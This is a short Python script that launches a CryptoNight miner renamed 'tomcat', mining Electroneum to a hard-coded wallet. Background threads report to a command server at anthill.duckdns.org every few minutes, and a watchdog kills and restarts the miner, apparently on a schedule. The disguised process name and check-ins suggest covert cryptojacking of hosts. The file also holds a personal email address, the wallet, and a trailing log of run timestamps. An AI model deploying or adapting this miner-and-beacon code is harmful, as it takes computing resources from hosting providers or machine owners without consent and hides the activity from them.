import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:03.678982
#2018-02-17 17:17:04.016015
#2018-02-17 19:05:05.984146
#2018-02-17 20:52:03.950104
#2018-02-17 22:39:01.790101
#2018-02-18 00:23:01.609504
#2018-02-18 02:14:06.129286
#2018-02-18 04:01:03.829476
#2018-02-18 05:49:05.495155
#2018-02-18 07:41:04.152411
#2018-02-18 09:27:06.899128
#2018-02-18 11:13:07.478367
#2018-02-18 13:00:01.818666
#2018-02-18 14:48:05.540899
#2018-02-18 16:35:04.189059
#2018-02-18 18:24:05.255611
#2018-02-18 20:11:05.104303
#2018-02-18 21:57:04.128627
#2018-02-18 23:46:07.425641
#2018-02-19 01:34:03.838155
#2018-02-19 03:22:03.706856
#2018-02-19 05:07:01.428475
#2018-02-19 06:52:05.876972
#2018-02-19 08:41:03.990940
#2018-02-19 10:30:01.622786
#2018-02-19 12:18:06.576716
#2018-02-19 14:05:01.345016
#2018-02-19 15:53:07.083479
#2018-02-19 17:41:08.515555
#2018-02-19 19:30:12.752151
#2018-02-19 21:17:08.300730
#2018-02-19 23:04:02.064196
#2018-02-20 00:49:05.102698
#2018-02-20 02:38:02.161270
#2018-02-20 04:27:05.446128
#2018-02-20 06:11:05.283345
#2018-02-20 07:55:08.477282
#2018-02-20 09:41:01.629924
#2018-02-20 11:25:09.348359
#2018-02-20 13:13:06.553475
#2018-02-20 14:59:07.963185
#2018-02-20 16:44:08.248560
#2018-02-20 18:35:09.815910
#2018-02-20 20:25:02.231596
#2018-02-20 22:10:07.808318
#2018-02-20 23:51:06.379737
#2018-02-21 01:37:05.603913
#2018-02-21 03:26:04.876746
#2018-02-21 05:14:03.639860
#2018-02-21 07:02:03.332247
#2018-02-21 08:47:05.981243
#2018-02-21 10:33:05.322037
#2018-02-21 12:21:04.582217
#2018-02-21 14:08:06.775678
#2018-02-21 15:53:08.199214
#2018-02-21 17:46:10.520590
#2018-02-21 19:33:01.646957
#2018-02-21 21:19:07.662823
#2018-02-21 23:18:07.313927
#2018-02-22 01:08:06.423388
#2018-02-22 02:55:06.785222
#2018-02-22 04:42:04.312788
#2018-02-22 06:26:07.705505
#2018-02-22 08:13:01.692474
#2018-02-22 10:01:04.774129
#2018-02-22 11:45:08.837110
#2018-02-22 13:30:11.161401
#2018-02-22 15:18:01.586600
#2018-02-22 17:04:07.151502
#2018-02-22 18:50:10.638877
#2018-02-22 20:42:04.428771
#2018-02-22 22:28:01.562271
#2018-02-23 00:13:01.656493
#2018-02-23 02:01:07.794717
#2018-02-23 03:49:06.119741
#2018-02-23 05:40:07.622876
#2018-02-23 07:24:07.727240
#2018-02-23 09:28:04.618319
#2018-02-23 11:33:06.711035
#2018-02-23 13:23:06.957492
#2018-02-23 15:09:07.556721
#2018-02-23 16:58:06.835758
#2018-02-23 19:07:07.127198
#2018-02-23 20:52:03.333753
#2018-02-23 22:39:01.500859
#2018-02-24 00:26:05.182364
#2018-02-24 02:17:01.615207
#2018-02-24 04:06:08.531194
#2018-02-24 05:54:05.929803
#2018-02-24 07:41:06.630204
#2018-02-24 09:26:05.621525
#2018-02-24 11:20:04.947374
#2018-02-24 13:09:07.592013
#2018-02-24 14:59:06.227772
#2018-02-24 16:49:06.176974
#2018-02-24 18:37:01.529653
#2018-02-24 20:27:05.957148
#2018-02-24 22:23:03.713181
#2018-02-25 01:30:10.077426
#2018-02-25 05:14:03.952054
#2018-02-25 11:08:01.460129